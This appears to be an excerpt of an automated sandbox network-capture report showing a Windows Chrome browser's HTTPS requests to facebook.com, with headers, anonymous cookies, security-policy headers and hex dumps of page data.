                                                                                                                                                                                                                                Data Ascii: tagRedirect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CookiePrivacySandboxConfig",[],{"is_affected_by_samesite_lax":false},7723],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["Coo
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC1500INData Raw: 2c 7b 22 41 43 43 4f 55 4e 54 5f 49 44 22 3a 22 30 22 2c 22 55 53 45 52 5f 49 44 22 3a 22 30 22 2c 22 4e 41 4d 45 22 3a 22 22 2c 22 53 48 4f 52 54 5f 4e 41 4d 45 22 3a 6e 75 6c 6c 2c 22 49 53 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 48 41 53 5f 53 45 43 4f 4e 44 41 52 59 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 46 41 43 45 42 4f 4f 4b 5f 57 4f 52 4b 5f 41 43 43 4f 55 4e 54 22 3a 66 61 6c 73 65 2c 22 49 53 5f 49 4e 53 54 41 47 52 41 4d 5f 42 55 53 49 4e 45 53 53 5f 50 45 52 53 4f 4e 22 3a 66 61 6c 73 65 2c 22 49 53 5f 4d 45 53 53 45 4e 47 45 52 5f 4f 4e 4c 59 5f 55 53 45 52 22 3a 66 61 6c 73 65 2c 22 49 53 5f 44 45 41 43 54 49 56 41 54 45 44 5f 41 4c 4c 4f
                                                                                                                                                                                                                                Data Ascii: ,{"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_INSTAGRAM_BUSINESS_PERSON":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLO
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC1500INData Raw: 31 30 22 7d 2c 35 32 37 5d 2c 5b 22 50 72 6f 6d 69 73 65 55 73 65 50 6f 6c 79 66 69 6c 6c 53 65 74 49 6d 6d 65 64 69 61 74 65 47 4b 22 2c 5b 5d 2c 7b 22 77 77 77 5f 61 6c 77 61 79 73 5f 75 73 65 5f 70 6f 6c 79 66 69 6c 6c 5f 73 65 74 69 6d 6d 65 64 69 61 74 65 22 3a 66 61 6c 73 65 7d 2c 32 31 39 30 5d 2c 5b 22 4a 53 45 72 72 6f 72 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 61 70 70 49 64 22 3a 32 35 36 32 38 31 30 34 30 35 35 38 2c 22 65 78 74 72 61 22 3a 5b 5d 2c 22 72 65 70 6f 72 74 49 6e 74 65 72 76 61 6c 22 3a 35 30 2c 22 73 61 6d 70 6c 65 57 65 69 67 68 74 22 3a 6e 75 6c 6c 2c 22 73 61 6d 70 6c 65 57 65 69 67 68 74 4b 65 79 22 3a 22 5f 5f 6a 73 73 65 73 77 22 2c 22 70 72 6f 6a 65 63 74 42 6c 6f 63 6b 6c 69 73 74 22 3a 5b 5d 7d 2c 32
                                                                                                                                                                                                                                Data Ascii: 10"},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["JSErrorLoggingConfig",[],{"appId":256281040558,"extra":[],"reportInterval":50,"sampleWeight":null,"sampleWeightKey":"__jssesw","projectBlocklist":[]},2
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC1500INData Raw: 5b 22 52 75 6e 42 6c 75 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 33 38 36 22 2c 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72 54 69 6d 65 6f 75 74 57 57 57 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 37 33 39 30 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 57 57 57 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 30 33 32 36 37 22 2c 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 42 6c 75 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72
                                                                                                                                                                                                                                Data Ascii: ["RunBlue",null]},-1],["cr:7386",["clearTimeoutWWW"],{"__rc":["clearTimeoutWWW",null]},-1],["cr:7390",["setTimeoutWWW"],{"__rc":["setTimeoutWWW",null]},-1],["cr:1003267",["clearIntervalBlue"],{"__rc":["clearIntervalBlue",null]},-1],["cr:896462",["setInter
                                                                                                                                                                                                                                2024-09-29 04:54:49 UTC1500INData Raw: 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 70 6f 6c 69 63 79 5c 2f 6f 70 74 69 6e 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 77 72 69 74 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 6c 65 67 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 6f 70 74 69 6e 5c 2f 66 72 65 65 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 22 3a 31 2c 22 5c 2f 61 62 6f 75 74 5c 2f 70 72 69 76 61 63 79 5c 2f 75 70 64 61 74 65 5c 2f 22 3a 31 2c 22 5c 2f 70 72 69 76 61 63 79 5c 2f 65 78 70 6c 61 6e 61 74 69 6f 6e 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65 5c 2f 77 65 6c 63 6f 6d 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 74 6f 67 67 6c 65
                                                                                                                                                                                                                                Data Ascii: pported_browser\/":1,"\/zero\/policy\/optin":1,"\/zero\/optin\/write\/":1,"\/zero\/optin\/legal\/":1,"\/zero\/optin\/free\/":1,"\/about\/privacy\/":1,"\/about\/privacy\/update\/":1,"\/privacy\/explanation\/":1,"\/zero\/toggle\/welcome\/":1,"\/zero\/toggle


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                131192.168.2.450055157.240.253.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:54 UTC1197OUTPOST /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=6&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 914
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAIgieWen8DMjiBG5
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://www.facebook.com/?locale=ru_RU
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:54 UTC914OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 41 49 67 69 65 57 65 6e 38 44 4d 6a 69 42 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 73 22 0d 0a 0d 0a 31 37 32 37 35 38 35 36 39 32 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 41 49 67 69 65 57 65 6e 38 44 4d 6a 69 42 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 71 22 0d 0a 0d 0a 5b 7b 22 75 73 65 72 22 3a 22 30 22 2c 22 77 65 62 53 65 73 73 69 6f 6e 49 64 22 3a 22 66 63 6d 6a 6b 79 3a 6f 37 36 65 6a 62 3a 39 35 6e 68 6a 64 22 2c 22 61 70 70 5f 69 64 22 3a 22 32 35 36 32 38 31
                                                                                                                                                                                                                                Data Ascii: ------WebKitFormBoundaryAIgieWen8DMjiBG5Content-Disposition: form-data; name="ts"1727585692549------WebKitFormBoundaryAIgieWen8DMjiBG5Content-Disposition: form-data; name="q"[{"user":"0","webSessionId":"fcmjky:o76ejb:95nhjd","app_id":"256281
                                                                                                                                                                                                                                2024-09-29 04:54:54 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419924058819609551", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419924058819609551"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:54 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:54 UTC1922INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                132192.168.2.450058157.240.251.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:55 UTC871OUTGET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923890061341413&__req=6&__rev=1016900551&__s=fcmjky%3Ao76ejb%3A95nhjd&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585655&__user=0&dpr=1&jazoest=21020&locale=ru_RU&lsd=AVrwfIkMup0 HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:56 UTC747INHTTP/1.1 200 OK
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419924066463506560", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419924066463506560"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:56 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:56 UTC1705INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                133192.168.2.450060157.240.253.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:58 UTC818OUTGET /pages/create/?ref_type=registration_form HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5; wd=1280x907; datr=d934ZsjiAffZHUJjG80fHvH1
                                                                                                                                                                                                                                2024-09-29 04:54:59 UTC770INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419924079772026106", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419924079772026106"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:59 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:59 UTC1714INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                2024-09-29 04:54:59 UTC157INData Raw: 62 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d
                                                                                                                                                                                                                                Data Ascii: bbe<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="m
                                                                                                                                                                                                                                2024-09-29 04:54:59 UTC1500INData Raw: 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 57 34 67 46 5a 74 54 36 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 3f 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 45 6e 76 22 5d 2c 62 29 3a 28 77 69 6e 64 6f 77 2e 45 6e 76 3d 77 69 6e 64 6f 77 2e 45 6e 76 7c 7c 7b 7d 2c 62 28 77 69 6e 64 6f 77 2e 45 6e 76 29 29 7d 65 6e 76 46 6c 75 73 68 28 7b 22 75 73 65 54 72 75 73 74 65 64 54 79 70 65 73 22 3a 66 61 6c 73 65 2c 22 69 73 54 72 75 73 74 65 64 54 79 70 65 73 52 65 70 6f 72 74 4f 6e 6c 79 22 3a 66 61
                                                                                                                                                                                                                                Data Ascii: eta_referrer" /><script nonce="W4gFZtT6">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":fa
